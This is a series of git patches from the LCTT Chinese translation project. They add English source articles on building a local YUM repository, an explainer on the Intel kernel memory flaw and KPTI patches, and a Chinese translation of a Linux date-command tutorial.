From: darksun
Date: Mon, 8 Jan 2018 13:06:58 +0800
Subject: [PATCH 163/371] =?UTF-8?q?=E9=80=89=E9=A2=98:=20Creating=20a=20YU?=
=?UTF-8?q?M=20repository=20from=20ISO=20&=20Online=20repo?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...a YUM repository from ISO - Online repo.md | 116 ++++++++++++++++++
1 file changed, 116 insertions(+)
create mode 100644 sources/tech/20170526 Creating a YUM repository from ISO - Online repo.md
diff --git a/sources/tech/20170526 Creating a YUM repository from ISO - Online repo.md b/sources/tech/20170526 Creating a YUM repository from ISO - Online repo.md
new file mode 100644
index 0000000000..cd21bb951a
--- /dev/null
+++ b/sources/tech/20170526 Creating a YUM repository from ISO - Online repo.md
@@ -0,0 +1,116 @@
+Creating a YUM repository from ISO & Online repo
+======
+
+The YUM tool is one of the most important tools for CentOS/RHEL/Fedora. Though it has been replaced with DNF in the latest builds of Fedora, that does not at all mean it has run its course. It is still widely used for installing RPM packages; we have already discussed YUM with examples in our earlier tutorial ([ **READ HERE**][1]).
+
+In this tutorial, we are going to learn to create a local YUM repository, first by using the ISO image of the OS & then by creating a mirror of an online yum repository.
+
+### Creating YUM with DVD ISO
+
+We are using a CentOS 7 DVD for this tutorial & the same process should work on RHEL 7 as well.
+
+Firstly, create a directory named YUM at the root of the filesystem,
+
+```
+$ mkdir /YUM
+```
+
+then mount the CentOS 7 ISO (creating the mount point first if it does not already exist),
+
+```
+$ mkdir -p /mnt/iso
+$ mount -t iso9660 -o loop /home/dan/Centos-7-x86_x64-DVD.iso /mnt/iso/
+```
+
+Next, copy the packages from the mounted ISO to the /YUM folder; a sketch of the copy step follows.
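+
+Assuming the DVD's RPMs live under the Packages/ directory of the mount point used above (adjust the path to match your media), the copy can be done with:
+
+```
+$ cp -ar /mnt/iso/Packages/. /YUM/
+```
+
+Once all the packages have been copied, we will install the packages required for creating the repository metadata. Change into /YUM & install the following RPM packages,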
+
+```
+$ cd /YUM
+$ rpm -ivh deltarpm-*.rpm
+$ rpm -ivh python-deltarpm-*.rpm
+$ rpm -ivh createrepo-*.rpm
+```
+
+Once these packages have been installed, we will create a file named **local.repo** in the **/etc/yum.repos.d** folder with all the repository information,
+
+```
+$ vi /etc/yum.repos.d/local.repo
+```
+
+```
+[localrepo]
+name=Local YUM
+baseurl=file:///YUM
+gpgcheck=0
+enabled=1
+```
+
+Save & exit the file. Next, we will create the repository metadata by running the following command
+
+```
+$ createrepo -v /YUM
+```
+
+It will take some time to create the repo data. Once the process finishes, run
+
+```
+$ yum clean all
+```
+
+to clean cache & then run
+
+```
+$ yum repolist
+```
+
+to check the list of all repositories. You should see the new `localrepo` repository in the list.
+
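+As a quick sanity check, you can try installing something using only the new local repository (the package name below is just an example; pick anything that ships on the DVD):
+
+```
+$ yum --disablerepo="*" --enablerepo="localrepo" install wget
+```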
+
+### Creating mirror YUM repository with online repository
+
+The process of creating a mirror repository is similar to creating one from an ISO image, with one exception: we will fetch our RPM packages from an online repository instead of an ISO.
+
+Firstly, we need to find an online repository to get the latest packages. It is advisable to pick a mirror that is close to your location in order to optimize download speeds. We will be using the one mentioned below; you can select the one nearest to your location from the [CENTOS MIRROR LIST][2].
+
+After selecting a mirror, we will sync that mirror with our system using rsync, but before you do that, make sure that you have plenty of space on your server.
+
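+A quick check of the free space on the filesystem that holds /YUM (the full CentOS Packages tree runs to several gigabytes):
+
+```
+$ df -h /YUM
+```
+
+Then start the sync:
+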
+```
+$ rsync -avz rsync://mirror.fibergrid.in/centos/7.2/os/x86_64/Packages/s/ /YUM
+```
+
+Sync will take quite a while (maybe an hour) depending on your internet speed. After the syncing is completed, we will update our repo-data
+
+```
+$ createrepo -v /YUM
+```
+
+Our repository is now ready to use. We can create a cron job to update it automatically at a set time, daily or weekly, as per your needs.
+
+To create a cron job for syncing the repository, run
+
+```
+$ crontab -e
+```
+
+& add the following line
+
+```
+30 0 * * * rsync -avz rsync://mirror.fibergrid.in/centos/7.2/os/x86_64/Packages/s/ /YUM
+```
+
+This will sync the repository every night at 12:30 AM. Also remember to create the repository configuration file in /etc/yum.repos.d, as we did above, and to re-run createrepo after each sync so that the repository metadata stays up to date.
+
+That's it guys, you now have your own yum repository to use. Please share this article if you like it & leave your comments/queries in the comment box down below.
+
+
+--------------------------------------------------------------------------------
+
+via: http://linuxtechlab.com/creating-yum-repository-iso-online-repo/
+
+作者:[Shusain][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:http://linuxtechlab.com/author/shsuain/
+[1]:http://linuxtechlab.com/using-yum-command-examples/
+[2]:http://mirror.centos.org/centos/
From a1037e3790066308aa43533506797f2a71972551 Mon Sep 17 00:00:00 2001
From: Ezio
Date: Mon, 8 Jan 2018 13:10:45 +0800
Subject: [PATCH 164/371] =?UTF-8?q?20180108-3=20=E9=80=89=E9=A2=98?=
MIME-Version: 1.0
Content-Type: text/plain; charset=UTF-8
Content-Transfer-Encoding: 8bit
---
...el design flaw forcing numerous patches.md | 99 +++++++++++++++++++
1 file changed, 99 insertions(+)
create mode 100644 sources/tech/20180104 Whats behind the Intel design flaw forcing numerous patches.md
diff --git a/sources/tech/20180104 Whats behind the Intel design flaw forcing numerous patches.md b/sources/tech/20180104 Whats behind the Intel design flaw forcing numerous patches.md
new file mode 100644
index 0000000000..f8d1c49aa0
--- /dev/null
+++ b/sources/tech/20180104 Whats behind the Intel design flaw forcing numerous patches.md
@@ -0,0 +1,99 @@
+What’s behind the Intel design flaw forcing numerous patches?
+============================================================
+
+### There's obviously a big problem, but we don't know exactly what.
+
+
+![](https://cdn.arstechnica.net/wp-content/uploads/2015/06/intel-48-core-larrabee-probably-640x427.jpg)
+
+
+Both Windows and Linux are receiving significant security updates that can, in the worst case, cause performance to drop by half, to defend against a problem that as yet hasn't been fully disclosed.
+
+Patches to the Linux kernel have been trickling in over the past few weeks. Microsoft has been [testing the Windows updates in the Insider program since November][3], and it is expected to put the alterations into mainstream Windows builds on Patch Tuesday next week. Microsoft's Azure has scheduled maintenance next week, and Amazon's AWS is scheduled for maintenance on Friday—presumably related.
+
+Since the Linux patches [first came to light][4], a clearer picture of what seems to be wrong has emerged. While Linux and Windows differ in many regards, the basic elements of how these two operating systems—and indeed, every other x86 operating system such as FreeBSD and [macOS][5]—handle system memory is the same, because these parts of the operating system are so tightly coupled to the capabilities of the processor.
+
+### Keeping track of addresses
+
+Every byte of memory in a system is implicitly numbered, those numbers being each byte's address. The very earliest operating systems operated using physical memory addresses, but physical memory addresses are inconvenient for lots of reasons. For example, there are often gaps in the addresses, and (particularly on 32-bit systems), physical addresses can be awkward to manipulate, requiring 36-bit numbers, or even larger ones.
+
+Accordingly, modern operating systems all depend on a broad concept called virtual memory. Virtual memory systems allow both programs and the kernels themselves to operate in a simple, clean, uniform environment. Instead of the physical addresses with their gaps and other oddities, every program, and the kernel itself, uses virtual addresses to access memory. These virtual addresses are contiguous—no need to worry about gaps—and sized conveniently to make them easy to manipulate. 32-bit programs see only 32-bit addresses, even if the physical address requires 36-bit or more numbering.
+
+While this virtual addressing is transparent to almost every piece of software, the processor does ultimately need to know which physical memory a virtual address refers to. There's a mapping from virtual addresses to physical addresses, and that's stored in a large data structure called a page table. Operating systems build the page table, using a layout determined by the processor, and the processor and operating system in conjunction use the page table whenever they need to convert between virtual and physical addresses.
+
+This whole mapping process is so important and fundamental to modern operating systems and processors that the processor has dedicated cache—the translation lookaside buffer, or TLB—that stores a certain number of virtual-to-physical mappings so that it can avoid using the full page table every time.
+
+The use of virtual memory gives us a number of useful features beyond the simplicity of addressing. Chief among these is that each individual program is given its own set of virtual addresses, with its own set of virtual to physical mappings. This is the fundamental technique used to provide "protected memory;" one program cannot corrupt or tamper with the memory of another program, because the other program's memory simply isn't part of the first program's mapping.
+
+But these uses of an individual mapping per process, and hence extra page tables, puts pressure on the TLB cache. The TLB isn't very big—typically a few hundred mappings in total—and the more page tables a system uses, the less likely it is that the TLB will include any particular virtual-to-physical translation.
+
+### Half and half
+
+To make the best use of the TLB, every mainstream operating system splits the range of virtual addresses into two. One half of the addresses is used for each program; the other half is used for the kernel. When switching between processes, only half the page table entries change—the ones belonging to the program. The kernel half is common to every program (because there's only one kernel), and so it can use the same page table mapping for every process. This helps the TLB enormously; while it still has to discard mappings belonging to the process' half of memory addresses, it can keep the mappings for the kernel's half.
+
+This design isn't completely set in stone. Work was done on Linux to make it possible to give a 32-bit process the entire range of addresses, with no sharing between the kernel's page table and that of each program. While this gave the programs more address space, it carried a performance cost, because the TLB had to reload the kernel's page table entries every time kernel code needed to run. Accordingly, this approach was never widely used on x86 systems.
+
+One downside of the decision to split the virtual address space between the kernel and each program is that the memory protection is weakened. If the kernel had its own set of page tables and virtual addresses, it would be afforded the same protection as different programs have from one another; the kernel's memory would be simply invisible. But with the split addressing, user programs and the kernel use the same address range, and, in principle, a user program would be able to read and write kernel memory.
+
+To prevent this obviously undesirable situation, the processor and virtual addressing system have a concept of "rings" or "modes." x86 processors have lots of rings, but for this issue, only two are relevant: "user" (ring 3) and "supervisor" (ring 0). When running regular user programs, the processor is put into user mode, ring 3. When running kernel code, the processor is in ring 0, supervisor mode, also known as kernel mode.
+
+These rings are used to protect the kernel memory from user programs. The page tables aren't just mapping from virtual to physical addresses; they also contain metadata about those addresses, including information about which rings can access an address. The kernel's page table entries are all marked as only being accessible to ring 0; the program's entries are marked as being accessible from any ring. If an attempt is made to access ring 0 memory while in ring 3, the processor blocks the access and generates an exception. The result of this is that user programs, running in ring 3, should not be able to learn anything about the kernel and its ring 0 memory.
+
+At least, that's the theory. The spate of patches and updates shows that somewhere this has broken down. This is where the big mystery lies.
+
+### Moving between rings
+
+Here's what we do know. Every modern processor performs a certain amount of speculative execution. For example, given some instructions that add two numbers and then store the result in memory, a processor might speculatively do the addition before ascertaining whether the destination in memory is actually accessible and writeable. In the common case, where the location _is_ writeable, the processor managed to save some time, as it did the arithmetic in parallel with figuring out what the destination in memory was. If it discovers that the location isn't accessible—for example, a program trying to write to an address that has no mapping and no physical location at all—then it will generate an exception and the speculative execution is wasted.
+
+Intel processors, specifically—[though not AMD ones][6]—allow speculative execution of ring 3 code that writes to ring 0 memory. The processors _do_ properly block the write, but the speculative execution minutely disturbs the processor state, because certain data will be loaded into cache and the TLB in order to ascertain whether the write should be allowed. This in turn means that some operations will be a few cycles quicker, or a few cycles slower, depending on whether their data is still in cache or not. As well as this, Intel's processors have special features, such as the Software Guard Extensions (SGX) introduced with Skylake processors, that slightly change how attempts to access memory are handled. Again, the processor does still protect ring 0 memory from ring 3 programs, but again, its caches and other internal state are changed, creating measurable differences.
+
+What we don't know, yet, is just how much kernel memory information can be leaked to user programs or how easily that leaking can occur. And which Intel processors are affected? Again it's not entirely clear, but indications are that every Intel chip with speculative execution (which is all the mainstream processors introduced since the Pentium Pro, from 1995) can leak information this way.
+
+The first wind of this problem came from researchers from [Graz Technical University in Austria][7]. The information leakage they discovered was enough to undermine kernel mode Address Space Layout Randomization (kernel ASLR, or KASLR). ASLR is something of a last-ditch effort to prevent the exploitation of [buffer overflows][8]. With ASLR, programs and their data are placed at random memory addresses, which makes it a little harder for attackers to exploit security flaws. KASLR applies that same randomization to the kernel so that the kernel's data (including page tables) and code are randomly located.
+
+The Graz researchers developed [KAISER][9], a set of Linux kernel patches to defend against the problem.
+
+If the problem were just that it enabled the derandomization of ASLR, this probably wouldn't be a huge disaster. ASLR is a nice protection, but it's known to be imperfect. It's meant to be a hurdle for attackers, not an impenetrable barrier. The industry reaction—a fairly major change to both Windows and Linux, developed with some secrecy—suggests that it's not just ASLR that's defeated and that a more general ability to leak information from the kernel has been developed. Indeed, researchers have [started to tweet][10] that they're able to leak and read arbitrary kernel data. Another possibility is that the flaw can be used to escape out of a virtual machine and compromise a hypervisor.
+
+The solution that both the Windows and Linux developers have picked is substantially the same, and derived from that KAISER work: the kernel page table entries are no longer shared with each process. In Linux, this is called Kernel Page Table Isolation (KPTI).
+
+With the patches, the memory address is still split in two; it's just the kernel half is almost empty. It's not quite empty, because a few kernel pieces need to be mapped permanently, whether the processor is running in ring 3 _or_ ring 0, but it's close to empty. This means that even if a malicious user program tries to probe kernel memory and leak information, it will fail—there's simply nothing to leak. The real kernel page tables are only used when the kernel itself is running.
+
+This undermines the very reason for the split address space in the first place. The TLB now needs to clear out any entries related to the real kernel page tables every time it switches to a user program, putting an end to the performance saving that splitting enabled.
+
+The impact of this will vary depending on the workload. Every time a program makes a call into the kernel—to read from disk, to send data to the network, to open a file, and so on—that call will be a little more expensive, since it will force the TLB to be flushed and the real kernel page table to be loaded. Programs that don't use the kernel much might see a hit of perhaps 2-3 percent—there's still some overhead because the kernel always has to run occasionally, to handle things like multitasking.
+
+But workloads that call into the kernel a ton will see a much greater performance drop-off. In a benchmark, a program that does virtually nothing _other_ than call into the kernel saw [its performance drop by about 50 percent][11]; in other words, each call into the kernel took twice as long with the patch as it did without. Benchmarks that use Linux's loopback networking also see a big hit, such as [17 percent][12] in this Postgres benchmark. Real database workloads using real networking should see lower impact, because with real networks, the overhead of calling into the kernel tends to be dominated by the overhead of using the actual network.
+
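+As a very rough way to feel this effect on your own machine, you could time a deliberately syscall-bound loop. With a one-byte block size, each block below costs a read() plus a write() system call, so almost all of the runtime is spent crossing the user/kernel boundary (this is only an illustration, not a rigorous benchmark):
+
+```
+$ time dd if=/dev/zero of=/dev/null bs=1 count=1000000
+```
+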
+While Intel systems are the ones known to have the defect, they may not be the only ones affected. Some platforms, such as SPARC and IBM's S390, are immune to the problem, as their processor memory management doesn't need the split address space and shared kernel page tables; operating systems on those platforms have always isolated their kernel page tables from user mode ones. But others, such as ARM, may not be so lucky; [comparable patches for ARM Linux][13] are under development.
+
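+If you want to check whether your own Linux kernel is already running with the isolation patches, here are a couple of hedged checks (the exact message text and flag names can differ between kernel versions and vendor backports):
+
+```
+$ dmesg | grep -i 'page table isolation'
+$ grep -qw pti /proc/cpuinfo && echo "pti flag present"
+```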
+
+
+[PETER BRIGHT][14] is Technology Editor at Ars. He covers Microsoft, programming and software development, Web technology and browsers, and security. He is based in Brooklyn, NY.
+
+--------------------------------------------------------------------------------
+
+via: https://arstechnica.com/gadgets/2018/01/whats-behind-the-intel-design-flaw-forcing-numerous-patches/
+
+作者:[ PETER BRIGHT ][a]
+译者:[译者ID](https://github.com/译者ID)
+校对:[校对者ID](https://github.com/校对者ID)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://arstechnica.com/author/peter-bright/
+[1]:https://arstechnica.com/author/peter-bright/
+[2]:https://arstechnica.com/gadgets/2018/01/whats-behind-the-intel-design-flaw-forcing-numerous-patches/?comments=1
+[3]:https://twitter.com/aionescu/status/930412525111296000
+[4]:https://lwn.net/SubscriberLink/741878/eb6c9d3913d7cb2b/
+[5]:https://twitter.com/aionescu/status/948609809540046849
+[6]:https://lkml.org/lkml/2017/12/27/2
+[7]:https://gruss.cc/files/kaiser.pdf
+[8]:https://arstechnica.com/information-technology/2015/08/how-security-flaws-work-the-buffer-overflow/
+[9]:https://github.com/IAIK/KAISER
+[10]:https://twitter.com/brainsmoke/status/948561799875502080
+[11]:https://twitter.com/grsecurity/status/947257569906757638
+[12]:https://www.postgresql.org/message-id/20180102222354.qikjmf7dvnjgbkxe@alap3.anarazel.de
+[13]:https://lwn.net/Articles/740393/
+[14]:https://arstechnica.com/author/peter-bright
+[15]:https://arstechnica.com/author/peter-bright
From c8cf9615244b8e520db86b6cbf28b23796d6f613 Mon Sep 17 00:00:00 2001
From: cyleung
Date: Mon, 8 Jan 2018 14:27:44 +0800
Subject: [PATCH 165/371] translating "yum find out path where is package
installed to on CentOS/RHEL"
---
... is package installed to on CentOS-RHEL.md | 29 ++++++++++---------
1 file changed, 15 insertions(+), 14 deletions(-)
diff --git a/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md b/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
index 01fe3928ce..9f9b896d6a 100644
--- a/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
+++ b/sources/tech/20180105 yum find out path where is package installed to on CentOS-RHEL.md
@@ -1,7 +1,8 @@
+translating by cyleung
yum find out path where is package installed to on CentOS/RHEL
======
-I have [install htop package on a CentOS/RHEL][1] . I wanted find out where and at what path htop package installed all files. Is there an easy way to tell yum where is package installed on a CentOS/RHEL?
+I have [install htop package on a CentOS/RHEL][1] . I wanted find out where and at what path htop package installed all files. Is there an easy way to tell yum where is package installed on a CentOS/RHEL?
[yum command][2] is an interactive, open source, rpm based, package manager for a CentOS/RHEL and clones. It can automatically perform the following operations for you:
@@ -60,9 +61,9 @@ Resolving Dependencies
---> Package libxml2-python.x86_64 0:2.9.1-6.el7_2.3 will be installed
---> Package python-kitchen.noarch 0:1.1.1-5.el7 will be installed
--> Finished Dependency Resolution
-
+
Dependencies Resolved
-
+
=======================================================================================
Package Arch Version Repository Size
=======================================================================================
@@ -71,11 +72,11 @@ Installing:
Installing for dependencies:
libxml2-python x86_64 2.9.1-6.el7_2.3 rhui-rhel-7-server-rhui-rpms 247 k
python-kitchen noarch 1.1.1-5.el7 rhui-rhel-7-server-rhui-rpms 266 k
-
+
Transaction Summary
=======================================================================================
Install 1 Package (+2 Dependent packages)
-
+
Total download size: 630 k
Installed size: 3.1 M
Is this ok [y/d/N]: y
@@ -89,19 +90,19 @@ Running transaction check
Running transaction test
Transaction test succeeded
Running transaction
- Installing : python-kitchen-1.1.1-5.el7.noarch 1/3
- Installing : libxml2-python-2.9.1-6.el7_2.3.x86_64 2/3
- Installing : yum-utils-1.1.31-42.el7.noarch 3/3
- Verifying : libxml2-python-2.9.1-6.el7_2.3.x86_64 1/3
- Verifying : yum-utils-1.1.31-42.el7.noarch 2/3
- Verifying : python-kitchen-1.1.1-5.el7.noarch 3/3
-
+ Installing : python-kitchen-1.1.1-5.el7.noarch 1/3
+ Installing : libxml2-python-2.9.1-6.el7_2.3.x86_64 2/3
+ Installing : yum-utils-1.1.31-42.el7.noarch 3/3
+ Verifying : libxml2-python-2.9.1-6.el7_2.3.x86_64 1/3
+ Verifying : yum-utils-1.1.31-42.el7.noarch 2/3
+ Verifying : python-kitchen-1.1.1-5.el7.noarch 3/3
+
Installed:
yum-utils.noarch 0:1.1.31-42.el7
-
+
Dependency Installed:
libxml2-python.x86_64 0:2.9.1-6.el7_2.3 python-kitchen.noarch 0:1.1.1-5.el7
-
+
Complete!
```
From 56d8869c311667238b39bdd486d936ecff81230c Mon Sep 17 00:00:00 2001
From: wxy
Date: Mon, 8 Jan 2018 14:32:35 +0800
Subject: [PATCH 166/371] PRF&PUB:20171205 How to Use the Date Command in
Linux.md
@lujun9972 https://linux.cn/article-9216-1.html
---
...05 How to Use the Date Command in Linux.md | 158 +++++++++++++++++
...05 How to Use the Date Command in Linux.md | 163 ------------------
2 files changed, 158 insertions(+), 163 deletions(-)
create mode 100644 published/20171205 How to Use the Date Command in Linux.md
delete mode 100644 translated/tech/20171205 How to Use the Date Command in Linux.md
diff --git a/published/20171205 How to Use the Date Command in Linux.md b/published/20171205 How to Use the Date Command in Linux.md
new file mode 100644
index 0000000000..007463d87d
--- /dev/null
+++ b/published/20171205 How to Use the Date Command in Linux.md
@@ -0,0 +1,158 @@
+如何使用 date 命令
+======
+
+![](https://www.rosehosting.com/blog/wp-content/uploads/2017/12/How-to-Use-the-Date-Command-in-Linux.jpg)
+
+在本文中, 我们会通过一些案例来演示如何使用 Linux 中的 `date` 命令。`date` 命令可以用户输出/设置系统日期和时间。 `date` 命令很简单, 请参见下面的例子和语法。
+
+默认情况下,当不带任何参数运行 `date` 命令时,它会输出当前系统日期和时间:
+
+```shell
+$ date
+Sat 2 Dec 12:34:12 CST 2017
+```
+
+### 语法
+
+```
+Usage: date [OPTION]... [+FORMAT]
+ or: date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]
+以给定格式显示当前时间,或设置系统时间。
+```
+
+### 案例
+
+下面这些案例会向你演示如何使用 `date` 命令来查看前后一段时间的日期时间。
+
+#### 1、 查找 5 周后的日期
+
+```shell
+date -d "5 weeks"
+Sun Jan 7 19:53:50 CST 2018
+```
+
+#### 2、 查找 5 周后又过 4 天的日期
+
+```shell
+date -d "5 weeks 4 days"
+Thu Jan 11 19:55:35 CST 2018
+```
+
+#### 3、 获取下个月的日期
+
+```shell
+date -d "next month"
+Wed Jan 3 19:57:43 CST 2018
+```
+
+#### 4、 获取下周日的日期
+
+```shell
+date -d last-sunday
+Sun Nov 26 00:00:00 CST 2017
+```
+
+`date` 命令还有很多格式化相关的选项, 下面的例子向你演示如何格式化 `date` 命令的输出.
+
+#### 5、 以 `yyyy-mm-dd` 的格式显示日期
+
+```shell
+date +"%F"
+2017-12-03
+```
+
+#### 6、 以 `mm/dd/yyyy` 的格式显示日期
+
+```shell
+date +"%m/%d/%Y"
+12/03/2017
+```
+
+#### 7、 只显示时间
+
+```shell
+date +"%T"
+20:07:04
+```
+
+#### 8、 显示今天是一年中的第几天
+
+```shell
+date +"%j"
+337
+```
+
+#### 9、 与格式化相关的选项
+
+| 格式 | 说明 |
+|---------------|----------------|
+| `%%` | 显示百分号 (`%`)。 |
+| `%a` | 星期的缩写形式 (如: `Sun`)。 |
+| `%A` | 星期的完整形式 (如: `Sunday`)。 |
+| `%b` | 缩写的月份 (如: `Jan`)。 |
+| `%B` | 当前区域的月份全称 (如: `January`)。 |
+| `%c` | 日期以及时间 (如: `Thu Mar 3 23:05:25 2005`)。 |
+| `%C` | 当前世纪;类似 `%Y`, 但是会省略最后两位 (如: `20`)。 |
+| `%d` | 月中的第几日 (如: `01`)。 |
+| `%D` | 日期;效果与 `%m/%d/%y` 一样。 |
+| `%e` | 月中的第几日, 会填充空格;与 `%_d` 一样。 |
+| `%F` | 完整的日期;跟 `%Y-%m-%d` 一样。 |
+| `%g` | 年份的后两位 (参见 `%G`)。 |
+| `%G` | 年份 (参见 `%V`);通常跟 `%V` 连用。 |
+| `%h` | 同 `%b`。 |
+| `%H` | 小时 (`00`..`23`)。 |
+| `%I` | 小时 (`01`..`12`)。 |
+| `%j` | 一年中的第几天 (`001`..`366`)。 |
+| `%k` | 小时, 用空格填充 ( `0`..`23`); 与 `%_H` 一样。 |
+| `%l` | 小时, 用空格填充 ( `1`..`12`); 与 `%_I` 一样。 |
+| `%m` | 月份 (`01`..`12`)。 |
+| `%M` | 分钟 (`00`..`59`)。 |
+| `%n` | 换行。 |
+| `%N` | 纳秒 (`000000000`..`999999999`)。 |
+| `%p` | 当前区域时间是上午 `AM` 还是下午 `PM`;未知则为空。 |
+| `%P` | 类似 `%p`, 但是用小写字母显示。 |
+| `%r` | 当前区域的 12 小时制显示时间 (如: `11:11:04 PM`)。 |
+| `%R` | 24 小时制的小时和分钟;同 `%H:%M`。 |
+| `%s` | 从 1970-01-01 00:00:00 UTC 到现在经历的秒数。 |
+| `%S` | 秒数 (`00`..`60`)。 |
+| `%t` | 制表符。 |
+| `%T` | 时间;同 `%H:%M:%S`。 |
+| `%u` | 星期 (`1`..`7`);1 表示 `星期一`。 |
+| `%U` | 一年中的第几个星期,以周日为一周的开始 (`00`..`53`)。 |
+| `%V` | 一年中的第几个星期,以周一为一周的开始 (`01`..`53`)。 |
+| `%w` | 用数字表示周几 (`0`..`6`); 0 表示 `周日`。 |
+| `%W` | 一年中的第几个星期, 周一为一周的开始 (`00`..`53`)。 |
+| `%x` | 当前区域的日期表示(如: `12/31/99`)。 |
+| `%X` | 当前区域的时间表示 (如: `23:13:48`)。 |
+| `%y` | 年份的后面两位 (`00`..`99`)。 |
+| `%Y` | 年。 |
+| `%z` | 以 `+hhmm` 的数字格式表示时区 (如: `-0400`)。 |
+| `%:z` | 以 `+hh:mm` 的数字格式表示时区 (如: `-04:00`)。 |
+| `%::z` | 以 `+hh:mm:ss` 的数字格式表示时区 (如: `-04:00:00`)。 |
+| `%:::z` | 以数字格式表示时区, 其中 `:` 的个数由你需要的精度来决定 (例如, `-04`, `+05:30`)。 |
+| `%Z` | 时区的字符缩写(例如, `EDT`)。 |
+
+#### 10、 设置系统时间
+
+你也可以使用 `date` 来手工设置系统时间,方法是使用 `--set` 选项, 下面的例子会将系统时间设置成 2017 年 8 月 30 日下午 4 点 22 分。
+
+```shell
+date --set="20170830 16:22"
+```
+
+当然, 如果你使用的是我们的 [VPS 托管服务][1],你总是可以联系并咨询我们的 Linux 专家管理员(通过客服电话或者下工单的方式)关于 `date` 命令的任何东西。他们是 24×7 在线的,会立即向您提供帮助。(LCTT 译注:原文的广告~)
+
+PS. 如果你喜欢这篇帖子,请点击下面的按钮分享或者留言。谢谢。
+
+--------------------------------------------------------------------------------
+
+via: https://www.rosehosting.com/blog/use-the-date-command-in-linux/
+
+作者:[rosehosting][a]
+译者:[lujun9972](https://github.com/lujun9972)
+校对:[wxy](https://github.com/wxy)
+
+本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
+
+[a]:https://www.rosehosting.com
+[1]:https://www.rosehosting.com/hosting-services.html
diff --git a/translated/tech/20171205 How to Use the Date Command in Linux.md b/translated/tech/20171205 How to Use the Date Command in Linux.md
deleted file mode 100644
index 9564b72e69..0000000000
--- a/translated/tech/20171205 How to Use the Date Command in Linux.md
+++ /dev/null
@@ -1,163 +0,0 @@
-如何使用 Date 命令
-======
-在本文中, 我们会通过一些案例来演示如何使用 linux 中的 date 命令. date 命令可以用户输出/设置系统日期和时间. Date 命令很简单, 请参见下面的例子和语法.
-
-默认情况下,当不带任何参数运行 date 命令时,它会输出当前系统日期和时间:
-
-```shell
-date
-```
-
-```
-Sat 2 Dec 12:34:12 CST 2017
-```
-
-#### 语法
-
-```
-Usage: date [OPTION]... [+FORMAT]
- or: date [-u|--utc|--universal] [MMDDhhmm[[CC]YY][.ss]]
-Display the current time in the given FORMAT, or set the system date.
-
-```
-
-### 案例
-
-下面这些案例会向你演示如何使用 date 命令来查看前后一段时间的日期时间.
-
-#### 1\. 查找5周后的日期
-
-```shell
-date -d "5 weeks"
-Sun Jan 7 19:53:50 CST 2018
-
-```
-
-#### 2\. 查找5周后又过4天的日期
-
-```shell
-date -d "5 weeks 4 days"
-Thu Jan 11 19:55:35 CST 2018
-
-```
-
-#### 3\. 获取下个月的日期
-
-```shell
-date -d "next month"
-Wed Jan 3 19:57:43 CST 2018
-```
-
-#### 4\. 获取下周日的日期
-
-```shell
-date -d last-sunday
-Sun Nov 26 00:00:00 CST 2017
-```
-
-date 命令还有很多格式化相关的选项, 下面的例子向你演示如何格式化 date 命令的输出.
-
-#### 5\. 以 yyyy-mm-dd 的格式显示日期
-
-```shell
-date +"%F"
-2017-12-03
-```
-
-#### 6\. 以 mm/dd/yyyy 的格式显示日期
-
-```shell
-date +"%m/%d/%Y"
-12/03/2017
-
-```
-
-#### 7\. 只显示时间
-
-```shell
-date +"%T"
-20:07:04
-
-```
-
-#### 8\. 显示今天是一年中的第几天
-
-```shell
-date +"%j"
-337
-
-```
-
-#### 9\. 与格式化相关的选项
-
-| **%%** | 百分号 (“**%**“). |
-| **%a** | 星期的缩写形式 (像这样, **Sun**). |
-| **%A** | 星期的完整形式 (像这样, **Sunday**). |
-| **%b** | 缩写的月份 (像这样, **Jan**). |
-| **%B** | 当前区域的月份全称 (像这样, **January**). |
-| **%c** | 日期以及时间 (像这样, **Thu Mar 3 23:05:25 2005**). |
-| **%C** | 本世纪; 类似 **%Y**, 但是会省略最后两位 (像这样, **20**). |
-| **%d** | 月中的第几日 (像这样, **01**). |
-| **%D** | 日期; 效果与 **%m/%d/%y** 一样. |
-| **%e** | 月中的第几日, 会填充空格; 与 **%_d** 一样. |
-| **%F** | 完整的日期; 跟 **%Y-%m-%d** 一样. |
-| **%g** | 年份的后两位 (参见 **%G**). |
-| **%G** | 年份 (参见 **%V**); 通常跟 **%V** 连用. |
-| **%h** | 同 **%b**. |
-| **%H** | 小时 (**00**..**23**). |
-| **%I** | 小时 (**01**..**12**). |
-| **%j** | 一年中的第几天 (**001**..**366**). |
-| **%k** | 小时, 用空格填充 ( **0**..**23**); same as **%_H**. |
-| **%l** | 小时, 用空格填充 ( **1**..**12**); same as **%_I**. |
-| **%m** | 月份 (**01**..**12**). |
-| **%M** | 分钟 (**00**..**59**). |
-| **%n** | 换行. |
-| **%N** | 纳秒 (**000000000**..**999999999**). |
-| **%p** | 当前区域时间是上午 **AM** 还是下午 **PM**; 未知则为空哦. |
-| **%P** | 类似 **%p**, 但是用小写字母现实. |
-| **%r** | 当前区域的12小时制现实时间 (像这样, **11:11:04 PM**). |
-| **%R** | 24-小时制的小时和分钟; 同 **%H:%M**. |
-| **%s** | 从 1970-01-01 00:00:00 UTC 到现在经历的秒数. |
-| **%S** | 秒数 (**00**..**60**). |
-| **%t** | tab 制表符. |
-| **%T** | 时间; 同 **%H:%M:%S**. |
-| **%u** | 星期 (**1**..**7**); 1 表示 **星期一**. |
-| **%U** | 一年中的第几个星期, 以周日为一周的开始 (**00**..**53**). |
-| **%V** | 一年中的第几个星期,以周一为一周的开始 (**01**..**53**). |
-| **%w** | 用数字表示周几 (**0**..**6**); 0 表示 **周日**. |
-| **%W** | 一年中的第几个星期, 周一为一周的开始 (**00**..**53**). |
-| **%x** | Locale’s date representation (像这样, **12/31/99**). |
-| **%X** | Locale’s time representation (像这样, **23:13:48**). |
-| **%y** | 年份的后面两位 (**00**..**99**). |
-| **%Y** | 年. |
